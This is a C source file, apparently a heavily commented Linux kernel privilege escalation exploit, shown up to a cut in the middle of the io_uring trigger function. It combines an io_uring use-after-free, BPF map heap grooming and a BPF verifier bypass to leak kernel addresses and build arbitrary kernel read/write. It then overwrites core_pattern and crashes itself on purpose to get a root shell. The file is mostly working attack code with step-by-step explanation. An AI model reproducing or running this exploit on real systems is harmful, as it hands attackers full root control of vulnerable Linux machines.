#define _GNU_SOURCE
#include <sched.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <err.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/bpf.h>
#include <sys/sendfile.h>
#include "io_uring.h" // Assuming this header contains io_uring related structs and macros

// --- Kernel Symbol Offsets (relative to STATIC_KBASE) ---
// These offsets need to be adjusted based on the target kernel version
// and are relative to a known kernel base address.
#define KERNEL_STATIC_BASE 0xffffffff81000000ULL
#define ARRAY_MAP_OPS_OFFSET (0xffffffff82c40600ULL - KERNEL_STATIC_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff83db6560ULL - KERNEL_STATIC_BASE)

// --- Utility Macros ---
#define SYSCHK(x)                                \
    ({                                           \
        typeof(x) __res = (x);                   \
        if (__res == (typeof(x))-1)              \
            err(1, "SYSCHK(" #x ")");            \
        __res;                                   \
    })

// For converting pointer to unsigned 64-bit integer
#define ptr_to_u64(ptr) ((__u64)(unsigned long)(ptr))

// Define a single instance of the given token
#define X1(...) __VA_ARGS__
#define X2(...) X1(__VA_ARGS__), X1(__VA_ARGS__)
#define X4(...) X2(__VA_ARGS__), X2(__VA_ARGS__)
#define X8(...) X4(__VA_ARGS__), X4(__VA_ARGS__)
#define X16(...) X8(__VA_ARGS__), X8(__VA_ARGS__)
#define X32(...) X16(__VA_ARGS__), X16(__VA_ARGS__)
#define X64(...) X32(__VA_ARGS__), X32(__VA_ARGS__)
#define X128(...) X64(__VA_ARGS__), X64(__VA_ARGS__)

// Macro to repeat a sequence of tokens 127 times
#define X127(...) \
    X64(__VA_ARGS__), \
    X32(__VA_ARGS__), \
    X16(__VA_ARGS__), \
    X8(__VA_ARGS__), \
    X4(__VA_ARGS__), \
    X2(__VA_ARGS__), \
    X1(__VA_ARGS__)

// --- BPF Related Definitions ---
// Non-exported BPF commands and flags
#ifndef __NR_BPF
#define __NR_BPF 321
#endif
#define BPF_F_MMAPABLE 1024
#define BPF_FUNC_ringbuf_query 134
#define BPF_FUNC_ringbuf_reserve 131
#define BPF_MAP_TYPE_RINGBUF 27
#define BPF_FUNC_ringbuf_discard 133
#define BPF_FUNC_ringbuf_output 130

// BPF Instruction Macros (for readability)
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
    ((struct bpf_insn){.code = CODE,          \
                        .dst_reg = DST,        \
                        .src_reg = SRC,        \
                        .off = OFF,            \
                        .imm = IMM})

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                      \
    ((struct bpf_insn){.code = BPF_LD | BPF_DW | BPF_IMM, \
                        .dst_reg = DST,                      \
                        .src_reg = SRC,                      \
                        .off = 0,                            \
                        .imm = (__u32)(IMM)}),               \
        ((struct bpf_insn){.code = 0,                        \
                            .dst_reg = 0,                    \
                            .src_reg = 0,                    \
                            .off = 0,                        \
                            .imm = ((__u64)(IMM)) >> 32})

#define BPF_MOV64_IMM(DST, IMM) \
    BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV64_REG(DST, SRC) \
    BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU64_IMM(OP, DST, IMM) \
    BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU64_REG(OP, DST, SRC) \
    BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
    BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_EXIT_INSN() BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

#define BPF_LD_MAP_FD(DST, MAP_FD) \
    BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
    BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM)

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
    BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
    BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

// Helper for BPF_FUNC_map_lookup_elem
// Reg 9 (BPF_REG_9) usually holds the map FD
// Reg 10 (BPF_REG_10) is frame pointer
#define BPF_MAP_GET_ADDR(idx, dst)                                   \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),                             \
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                        \
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                       \
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),                      \
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0,                    \
                     BPF_FUNC_map_lookup_elem),                      \
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(),      \
        BPF_MOV64_REG((dst), BPF_REG_0), BPF_MOV64_IMM(BPF_REG_0, 0)

#define BPF_MAP_GET(idx, dst)                                        \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),                             \
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                        \
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                       \
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),                      \
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0,                    \
                     BPF_FUNC_map_lookup_elem),                      \
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(),      \
        BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0),                      \
        BPF_MOV64_IMM(BPF_REG_0, 0)

// This macro is part of the BPF verifier bypass. It advances R5 by 0x20 and reads the byte at offset 0x16 from the new R5.
// If the byte at offset 0x16 has been incremented by the UAF write, the verifier still believes it is 0, but at runtime it is already 1.
#define BPF_GRAB                                     \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, 0x20), /* Add 0x20 to R5 (map value address) */ \
    BPF_LDX_MEM(BPF_B, BPF_REG_4, BPF_REG_5, 0x16), /* Load 1 byte from R5 + 0x16 into R4 */ \
    BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_4) /* Add R4 to R6 */

// Array size for BPF instructions
#define INST(x) (sizeof(x) / sizeof(struct bpf_insn))

// --- Global Variables ---
int sockets[2]; // Sockets for BPF communication
char log_buf[0x10000]; // Buffer for BPF verifier logs
char tmp_buf[0x1000];    // Generic temporary buffer for I/O, BPF data, etc.
char magic[0x1000];  // Used to identify corrupted BPF map pages

// --- BPF Program Definitions ---
// @step(name="Triggering the Vulnerability")
// This BPF program is designed to leak a struct bpf_array address.
// It leverages a BPF verifier assumption (bpf_map_is_rdonly) combined with the UAF
// to achieve a controlled stack overflow using `bpf_skb_load_bytes_relative`.
struct bpf_insn array_map_leak_prog[] = {
    BPF_MOV64_IMM(BPF_REG_6, 0),
    BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // Store context (skb pointer) in R8

    // Load the FD of the targeted BPF map (dup2'd to 0x100) into BPF_REG_9.
    // This BPF map has reclaimed the memory of the `io_buffer_list` object.
    BPF_LD_MAP_FD(BPF_REG_9, 0x100),
    // Get the address of element 0 from this map's value into BPF_REG_5.
    // This points to the start of the array map's user-controlled data, which overlaps
    // with the freed `io_buffer_list` due to heap grooming.
    BPF_MAP_GET_ADDR(0, BPF_REG_5),

    BPF_MOV64_IMM(BPF_REG_6, 0),
    // Load 1 byte from offset 0x16 relative to `map_value_base` (BPF_REG_5) into R4.
    // This offset `0x16` (22 decimal) specifically aligns with the `io_buffer_list->head`
    // field within the `kmalloc-64` slab. Due to the UAF, this byte has been
    // incremented by the kernel (e.g., from 0 to 1). The BPF verifier, however,
    // sees the map as read-only and frozen, assuming this value is 0.
    BPF_LDX_MEM(BPF_B, BPF_REG_4, BPF_REG_5, 0x16),
    BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_4), // Add the UAF-incremented value (1) to R6. So R6 = 1.

    // A series of BPF_GRAB instructions. Each BPF_GRAB advances R5 by 0x20
    // and then loads a byte from the new R5 + 0x16 into R4, adding it to R6.
    // The exact effect depends on the data on the heap. The goal here is to
    // ensure that, at runtime, R6 (which will become `len`) holds the value `1`.
    // The verifier's calculation, however, would result in `0` for R6 if the map
    // is assumed to be uncorrupted and read-only. This difference is key for the bypass.
    X127(BPF_GRAB), // Repeats BPF_GRAB 127 times
    BPF_MOV64_REG(BPF_REG_4, BPF_REG_6), // Copy the manipulated R6 (which is 1 at runtime) to R4.

    // Setup for calling `BPF_FUNC_skb_load_bytes_relative` to perform a controlled stack overflow.
    // We place magic values on the BPF stack to help verify the overflow and determine offsets.
    //
    // Desired Stack Layout (relative to R10 - stack pointer):
    // R10 - 8:   0xCAFE (magic sentinel 1)
    // R10 - 16:  0xBACA (magic sentinel 2)
    // R10 - 24:  FD of the output map (0x101)
    // R10 - 32:  Pointer to R10 - 8 (i.e., address of 0xCAFE). This is the target for corruption.
    // R10 - 40:  Buffer where `skb_load_bytes_relative` will write.
    //
    BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0xCAFE),   // Place 0xCAFE at R10 - 8
    BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, 0xBACA),  // Place 0xBACA at R10 - 16
    BPF_LD_MAP_FD(BPF_REG_9, 0x101),              // Load FD of the output map (0x101)
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_9, -24), // Store output map FD on stack at R10 - 24

    BPF_MOV64_REG(BPF_REG_5, BPF_REG_10),        // R5 = current stack pointer (R10)
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, -8),       // R5 = R10 - 8 (address of 0xCAFE)
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_5, -32), // Store the address of 0xCAFE (R10 - 8) at R10 - 32.
                                                     // This is the pointer that will be partially overwritten.

    // Call `bpf_skb_load_bytes_relative` to trigger the controlled overflow.
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_8),           // R1 = skb context (from R8)
    BPF_MOV64_IMM(BPF_REG_2, 0),                   // R2 = offset (start read from 0 in skb, i.e., `tmp_buf`)
    BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),          // R3 = destination buffer (start of write target on stack)
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -40),        // R3 = R10 - 40 (the buffer for writing)
    
    // R4 = len. At runtime, R4 is 1. The instruction `BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 8)`
    // makes `len = 1 + 8 = 9`. The verifier, however, assumes R4 is 0, so it calculates `len = 0 + 8 = 8`.
    // This discrepancy allows a 9-byte write instead of the expected 8 bytes.
    // The 9th byte overflows into the first byte of the value at R10 - 32.
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 8),          // R4 = 9 (runtime), 8 (verifier)
    BPF_MOV64_IMM(BPF_REG_5, 1),                   // R5 = flags (relative read from skb)
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),

    // Validate the successful stack overflow and extract the leaked kernel address.
    // The 9-byte write caused a 1-byte overflow into the pointer at R10 - 32.
    // This partially corrupted pointer, when loaded into R5, is carefully crafted
    // to point to a location that allows us to find our magic values and kernel pointers.
    BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_10, -32), // Load the *partially corrupted* pointer from R10 - 32 into R5.
                                                     // This value is no longer `R10 - 8`.

    // Check for the magic values read from the *kernel stack* using the corrupted pointer.
    // The 1-byte overflow at R10-32 has caused R5 to point to a misaligned location
    // relative to the original stack frame. By dereferencing R5 at specific offsets,
    // we expect to find our magic values (0xCAFE, 0xBACA) on the kernel stack.
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_5, 0),    // Load value at `*(R5 + 0)` into R6. If the corruption
                                                     // was successful, this should be 0xBACA from R10 - 16.
    BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, -8),   // Load value at `*(R5 - 8)` into R7. If successful,
                                                     // this should be a struct bpf_array pointer
                                                     // from an earlier stack frame.
    
    // Verification check: We expect the value at `*(R5 + 0)` (loaded into R6) to be `0xBACA`.
    // This confirms that the stack overflow correctly misaligned the pointer in R10 - 32
    // such that it now points to a location where 0xBACA resides on the kernel stack.
    // If R6 is NOT 0xBACA, jump 12 instructions (skip leak logic - overflow failed or misaligned).
    BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0xBACA, 12),
    
    // If the check passes, R7 (which holds the value from `*(R5 - 8)`) is now
    // expected to contain a pointer to our eBPF map, or a value from which
    // the struct bpf_array can be leaked.
    BPF_LD_MAP_FD(BPF_REG_9, 0x101),                 // Load output map FD for userspace communication
    BPF_MAP_GET_ADDR(1, BPF_REG_8),                  // Get address of element 1 in the output map
    BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),    // Store the leaked kernel address (R7) into the output map.
    BPF_MOV64_IMM(BPF_REG_0, 0),                     // Return 0 (success)
    BPF_EXIT_INSN(),
};

// @step(name="Arbitrary Kernel Read/Write Primitive")
// This BPF program provides arbitrary kernel read/write capabilities once a kernel address
// has been leaked. It utilizes the same verifier bypass technique as the leak program
// but achieves a full 8-byte overwrite on the stack to inject arbitrary kernel addresses.
struct bpf_insn kernel_read_write_prog[] = {
    BPF_MOV64_IMM(BPF_REG_6, 0),
    BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // Store context (skb) in R8

    // Same UAF-backed map as the leak program: dup2'd to FD 0x100.
    BPF_LD_MAP_FD(BPF_REG_9, 0x100),
    BPF_MAP_GET_ADDR(0, BPF_REG_5),

    BPF_MOV64_IMM(BPF_REG_6, 0),
    // Load the UAF-incremented byte (1) from the map's value into R4.
    BPF_LDX_MEM(BPF_B, BPF_REG_4, BPF_REG_5, 0x16),
    BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_4), // R6 = 1 (runtime)

    X127(BPF_GRAB), // Continue to manipulate R6, ensuring it stays at 1 (runtime).
    BPF_MOV64_REG(BPF_REG_4, BPF_REG_6), // R4 = 1 (runtime), 0 (verifier)

    // Set up the BPF stack with sentinels for the controlled overflow.
    // These sentinels will be fully overwritten by the `skb_load_bytes_relative` call
    // with the target kernel address provided from userspace.
    BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0xCAFE),   // Magic sentinel 1
    BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, 0xBACA),  // Magic sentinel 2

    BPF_MOV64_REG(BPF_REG_5, BPF_REG_10),         // R5 = SP
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, -8),        // R5 = SP - 8 (address of 0xCAFE)
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_5, -32), // Store the original address of 0xCAFE (R10 - 8)
                                                     // at R10 - 32. This is the stack location
                                                     // that will be completely overwritten with our arbitrary address.

    // Calculate `len` for `skb_load_bytes_relative` to achieve a controlled 16-byte write.
    // At runtime, R4 is 1.
    BPF_ALU64_IMM(BPF_MUL, BPF_REG_4, 8),          // R4 = 1 * 8 = 8 (runtime). Verifier still thinks R4 is 0.
    
    // Call `bpf_skb_load_bytes_relative` to perform the stack overflow.
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_8),           // R1 = skb context
    BPF_MOV64_IMM(BPF_REG_2, 0),                   // R2 = offset in skb (start reading from beginning of packet)
    BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),          // R3 = destination buffer on BPF stack
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -40),        // R3 = R10 - 40 (start of buffer to write into)
    // Final `len` calculation: At runtime, R4 is 8. `R4 + 8` makes R4 become 16.
    // The verifier, however, still thinks `len = 0 + 8 = 8`.
    // This allows `skb_load_bytes_relative` to read 16 bytes from the network packet (`tmp_buf`)
    // and write them starting from R10 - 40. This 16-byte write completely overwrites
    // the 8-byte value at R10 - 32 (where the pointer to 0xCAFE was) with user-controlled data.
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 8),          // R4 = 16 (runtime), 8 (verifier)
    BPF_MOV64_IMM(BPF_REG_5, 1),                   // R5 = flags (relative read from skb)
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),

    // Arbitrary Read/Write Logic:
    // The value at `R10 - 32` has been fully overwritten by the `skb_load_bytes_relative`
    // call with the 64-bit target kernel address provided by userspace in the `tmp_buf`
    // (specifically, `tmp_buf[8]` to `tmp_buf[15]`).
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_10, -32), // Load the *user-controlled target kernel address*
                                                     // (now at R10 - 32) into R8.
                                                     // In the eyes of the verifier, R8 still holds
                                                     // a safe pointer to the BPF stack. In reality, it's
                                                     // an arbitrary kernel address.
    BPF_LD_MAP_FD(BPF_REG_9, 0x101),                 // Load output map FD
    // Get control flag: Loads the *value* of element 1 from the output map (FD 0x101) into R7.
    // This value (0 for read, 1 for write) determines the operation.
    BPF_MAP_GET(1, BPF_REG_7),                       
    // Get data buffer address: Gets the *address* of element 2 from the output map into R6.
    // This is where read data is stored, or write data is loaded from.
    BPF_MAP_GET_ADDR(2, BPF_REG_6),                  

    // If R7 != 0 (meaning it's a write operation), jump to the write path.
    BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 0, 4), 

    // Read Path (R7 == 0):
    // Read 8 bytes (a 64-bit value) from the target kernel address (R8) into R5.
    BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_8, 0), 
    // Store the read value (R5) into element 2 of the output map (pointed to by R6).
    BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_5, 0), 
    BPF_MOV64_IMM(BPF_REG_0, 0),                  // Return 0 (success)
    BPF_EXIT_INSN(),

    // Write Path (R7 != 0):
    // Load the 64-bit value to write from element 2 of the output map (pointed to by R6) into R5.
    BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_6, 0), 
    // Write this value (R5) to the target kernel address (R8).
    BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_5, 0), 
    BPF_MOV64_IMM(BPF_REG_0, 0),                  // Return 0 (success)
    BPF_EXIT_INSN(),
};


// --- Function Declarations ---
static int util_bpf(int cmd, void *attr, size_t n);
static int setup_bpf_create_map(enum bpf_map_type map_type, unsigned int key_size,
                                unsigned int value_size, unsigned int max_entries,
                                unsigned int map_fd);
static int setup_bpf_create_mmapable_map(enum bpf_map_type map_type, unsigned int key_size,
                                         unsigned int value_size, unsigned int max_entries,
                                         unsigned int map_fd);
static int setup_bpf_prog_load(enum bpf_prog_type type, const struct bpf_insn *insns,
                               int insn_cnt, const char *license);
static int util_bpf_lookup_elem(int fd, const void *key, void *value);
static int util_bpf_update_elem(int fd, const void *key, const void *value, uint64_t flags);
static int util_bpf_map_freeze(int fd);
static int util_update_elem(int mapfd, int key, size_t val);
static size_t util_get_elem(int mapfd, int key);
static int load_leak_bpf_prog(void);
static int load_read_write_bpf_prog(void);
static size_t leak_kernel_read64(size_t addr);
static size_t exploit_kernel_write64(size_t addr, size_t val);
static void setup_cpu_affinity(int cpu_id);
static int util_check_core_pattern(void);
static void exploit_trigger_core_dump(char *cmd);
static void vuln_setup_io_uring_buffer_ring(int uring_fd, char *res_buffer,
                                            struct io_uring_buf_ring *ring_buffer);
static void vuln_trigger_io_uring_uaf(int uring_fd, int pipe_fd_read, 
                                      unsigned char *sq_ring,
                                      struct io_uring_sqe *sqes,
                                      struct io_uring_params *params);
static void spray_cross_cache_bpf_maps(int *bpf_map_fd, int (*prog_bpf_fds)[2]);

// --- Function Implementations ---

// Thin wrapper around the raw bpf(2) system call; forwards cmd/attr/size verbatim.
// Returns the syscall result (FD or 0 on success, -1 with errno on failure).
static int util_bpf(int cmd, void *attr, size_t n) {
    long rc = syscall(__NR_BPF, cmd, attr, n);
    return (int)rc;
}

// Wrapper for BPF_MAP_CREATE. Returns the new map FD, or -1 on failure.
static int setup_bpf_create_map(enum bpf_map_type map_type, unsigned int key_size,
                                unsigned int value_size, unsigned int max_entries,
                                unsigned int map_fd) {
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;
    attr.inner_map_fd = map_fd; // Only meaningful for nested (map-in-map) types

    return util_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
}

// Wrapper for BPF_MAP_CREATE that additionally sets BPF_F_MMAPABLE and
// BPF_F_RDONLY_PROG. Returns the new map FD, or -1 on failure.
static int setup_bpf_create_mmapable_map(enum bpf_map_type map_type, unsigned int key_size,
                                         unsigned int value_size, unsigned int max_entries,
                                         unsigned int map_fd) {
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;
    attr.inner_map_fd = map_fd;
    // BPF_F_MMAPABLE lets userspace mmap the value area; BPF_F_RDONLY_PROG
    // makes BPF programs see the map as read-only (important flags for this file).
    attr.map_flags = BPF_F_MMAPABLE | BPF_F_RDONLY_PROG;

    return util_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
}

// Wrapper for BPF_PROG_LOAD
static int setup_bpf_prog_load(enum bpf_prog_type type, const struct bpf_insn *insns,
                               int insn_cnt, const char *license) {
    union bpf_attr attr = {
        .prog_type = type,
        .prog_flags = BPF_F_TEST_RND_HI32, // Helps with verifier
        .insns = ptr_to_u64(insns),
        .insn_cnt = insn_cnt,
        .license = ptr_to_u64(license),
        .log_buf = (size_t)log_buf,
        .log_size = sizeof(log_buf),
        .log_level = 3, // Enable verbose logging for debugging
    };

    return util_bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
}

// Wrapper for BPF_MAP_LOOKUP_ELEM: copies the element for `key` into `value`.
// Exits the process via SYSCHK if the syscall fails.
static int util_bpf_lookup_elem(int fd, const void *key, void *value) {
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_fd = fd;
    attr.key = ptr_to_u64(key);
    attr.value = ptr_to_u64(value);

    return SYSCHK(syscall(__NR_BPF, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)));
}

// Wrapper for BPF_MAP_UPDATE_ELEM: writes `value` at `key` with the given flags.
// Exits the process via SYSCHK if the syscall fails.
static int util_bpf_update_elem(int fd, const void *key, const void *value, uint64_t flags) {
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_fd = fd;
    attr.key = ptr_to_u64(key);
    attr.value = ptr_to_u64(value);
    attr.flags = flags;

    return SYSCHK(syscall(__NR_BPF, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)));
}

// Wrapper for BPF_MAP_FREEZE: freezes the map so it can no longer be modified
// from userspace. Exits the process via SYSCHK if the syscall fails.
static int util_bpf_map_freeze(int fd) {
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_fd = fd;

    return SYSCHK(syscall(__NR_BPF, BPF_MAP_FREEZE, &attr, sizeof(attr)));
}

// Convenience helper: store the 64-bit value `val` at `key` in map `mapfd`.
static int util_update_elem(int mapfd, int key, size_t val) {
    int k = key;
    size_t v = val;

    return util_bpf_update_elem(mapfd, &k, &v, 0);
}

// Convenience helper: read the 64-bit value stored at `key` in map `mapfd`.
// util_bpf_lookup_elem() exits via SYSCHK on syscall failure, so `val` is
// normally always written; the zero-initializer is defensive so no path can
// ever return uninitialized stack data.
static size_t util_get_elem(int mapfd, int key) {
    size_t val = 0;
    util_bpf_lookup_elem(mapfd, &key, &val);
    return val;
}

// Loads the address-leak BPF program as a socket filter; returns its FD (or -1).
static int load_leak_bpf_prog(void) {
    static const char gpl[] = "GPL";

    return setup_bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, array_map_leak_prog,
                               INST(array_map_leak_prog), gpl);
}

// Loads the arbitrary read/write BPF program as a socket filter; returns its FD (or -1).
static int load_read_write_bpf_prog(void) {
    static const char gpl[] = "GPL";

    return setup_bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, kernel_read_write_prog,
                               INST(kernel_read_write_prog), gpl);
}

// @step(name="Arbitrary Kernel Read/Write Primitive")
// Performs an arbitrary 64-bit kernel read using the BPF primitive.
// `addr` is the kernel address to read; the value found there is returned.
// Protocol: element 1 of map FD 0x101 selects the operation (0 = read),
// bytes 8..15 of the packet carry the target address, and the BPF program
// deposits the result in element 2.
static size_t leak_kernel_read64(size_t addr) {
    util_update_elem(0x101, 1, 0); // Set mode to read
    // Store the address to read from in the buffer sent over the socket.
    // The BPF program will read this value and use it as the target address.
    *(size_t *)(&tmp_buf[8]) = addr;
    SYSCHK(write(sockets[0], tmp_buf, 0x10)); // Trigger BPF program execution
    return util_get_elem(0x101, 2); // Get the read value from BPF map element 2
}

// @step(name="Arbitrary Kernel Read/Write Primitive")
// Performs an arbitrary 64-bit kernel write using the BPF primitive.
// `addr` is the kernel address to write; `val` is the 64-bit value written.
// Protocol mirrors leak_kernel_read64(): element 1 of map FD 0x101 is the
// mode (1 = write), element 2 holds the value, and the packet carries `addr`.
// Always returns 0.
static size_t exploit_kernel_write64(size_t addr, size_t val) {
    util_update_elem(0x101, 1, 1); // Set mode to write
    util_update_elem(0x101, 2, val); // Store the value to write in BPF map element 2
    // Store the address to write to in the buffer sent over the socket.
    *(size_t *)(&tmp_buf[8]) = addr;
    SYSCHK(write(sockets[0], tmp_buf, 0x10)); // Trigger BPF program execution
    return 0;
}

// Pins the calling process to the single CPU `cpu_id`.
// Exits via SYSCHK if sched_setaffinity() fails.
static void setup_cpu_affinity(int cpu_id) {
    cpu_set_t cpus;

    CPU_ZERO(&cpus);
    CPU_SET(cpu_id, &cpus);
    SYSCHK(sched_setaffinity(0, sizeof(cpus), &cpus));
}

// Returns 1 if /proc/sys/kernel/core_pattern already starts with the expected
// overwritten handler string, 0 otherwise (including when the file can't be opened).
static int util_check_core_pattern(void) {
    char buf[0x100] = {};
    int fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);

    if (fd < 0) {
        perror("open /proc/sys/kernel/core_pattern");
        return 0;
    }
    SYSCHK(read(fd, buf, sizeof(buf)));
    close(fd);
    // Compare only the first 0x10 bytes against the expected pattern prefix.
    return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}

// @step(name="Privilege Escalation")
// Triggers a program crash to initiate the core dump and execute our payload.
// NOTE(review): the `cmd` parameter is unused in this function body — confirm
// whether it was intended for a future payload argument.
static void exploit_trigger_core_dump(char *cmd) {
    // Create a memfd to store the exploit binary
    int memfd = SYSCHK(memfd_create("", 0));
    // Copy current executable into memfd
    // NOTE(review): the open() FD here is neither checked nor closed — harmless
    // in a short-lived process, but worth confirming.
    SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
    // Duplicate memfd to file descriptor 666, which will be executed by core_pattern
    SYSCHK(dup2(memfd, 666));
    close(memfd);

    // Wait until core_pattern is overwritten by the main process
    while (util_check_core_pattern() == 0)
        sleep(1);

    puts("Core pattern overwritten. Triggering crash for root shell!");
    // Deliberate NULL write: crash this process so the kernel runs the
    // core_pattern pipe handler, which executes FD 666.
    *(size_t *)0 = 0;
}

// @step(name="io_uring Use-After-Free Vulnerability")
// Sets up the io_uring buffer rings for the vulnerability.
// `uring_fd`: the io_uring instance; `res_buffer`: 0x1000-byte backing buffer
// shared by every ring entry; `ring_buffer`: the mapped io_uring_buf_ring.
static void vuln_setup_io_uring_buffer_ring(int uring_fd, char *res_buffer,
                                            struct io_uring_buf_ring *ring_buffer) {
    // Initialize the ring buffer with a single entry
    ring_buffer->bufs[0].addr = (size_t)res_buffer;
    ring_buffer->bufs[0].len = 0x1000;
    ring_buffer->tail = 1;

    struct io_uring_buf_reg reg_ring = {
        .ring_addr = (unsigned long)ring_buffer,
        .ring_entries = 1,
        .bgid = 1};

    // Register a large number (0x1000) of buffer rings, all sharing the same
    // mapped ring but each with a distinct buffer group ID.
    // This is part of the heap grooming to ensure `io_buffer_list` objects will cross cache later.
    for (int i = 0; i < 0x1000; i++) {
        reg_ring.bgid = i; // Each ring gets a unique buffer group ID
        SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg_ring, 1));
    }
}

// @step(name="io_uring Use-After-Free Vulnerability")
// Triggers the io_uring use-after-free vulnerability (UAF).
// The vulnerability occurs when `io_uring` prepares an async IO_READV operation
// with a provided buffer list, but the buffer list is not correctly consumed/committed.
// This allows the buffer list to be unregistered (freed) prematurely, leading to UAF
// when the async operation later tries to access the freed memory.
// Primitive: Use-after-free increment primitive on `io_buffer_list` (kmalloc-64 slab)
// at offset 22 (corresponding to `bl->head` which is incremented).
static void vuln_trigger_io_uring_uaf(int uring_fd, int pipe_fd_read,
                                      unsigned char *sq_ring,
                                      struct io_uring_sqe *sqes,
                                      struct io_uring_params *params) {
    // SQE 0: A dummy read operation that keeps the queue busy before the UAF
    // is triggered by SQE 1; hence it is linked to SQE 1 via IOSQE_IO_LINK.
    sqes[0] = (struct io_uring_sqe){
        .opcode = IORING_OP_READ,
        .flags = IOSQE_IO_LINK, // Link with the next SQE
        .fd = pipe_fd_read,
        .addr = (size_t)tmp_buf,
